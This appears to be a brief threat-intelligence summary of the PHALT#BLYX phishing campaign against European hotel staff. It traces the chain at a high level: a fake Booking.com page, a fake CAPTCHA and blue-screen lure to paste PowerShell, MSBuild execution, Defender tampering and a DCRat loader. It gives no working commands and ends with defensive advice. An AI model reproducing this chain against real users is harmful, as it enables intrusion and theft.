Overview
- Securonix is tracking the late‑December PHALT#BLYX campaign targeting European hospitality staff with euro‑denominated reservation cancellation emails.
- Victims are redirected to a high‑fidelity Booking.com clone that shows a fake CAPTCHA followed by a full‑screen BSOD instructing them to paste a PowerShell command in the Run dialog.
- The command downloads an MSBuild project file (v.proj) that MSBuild.exe executes to tamper with Microsoft Defender, seek elevation through repeated UAC prompts, and establish Startup folder .url persistence.
- The final payload is a customized DCRat loader that injects into legitimate processes for stealth and enables remote access, keylogging, and delivery of additional malware.
- Researchers note a shift from HTA/mshta delivery to living‑off‑the‑land execution via MSBuild, report Russian‑language artifacts without firm attribution, and share IOCs plus guidance to verify booking emails and monitor MSBuild and PowerShell activity.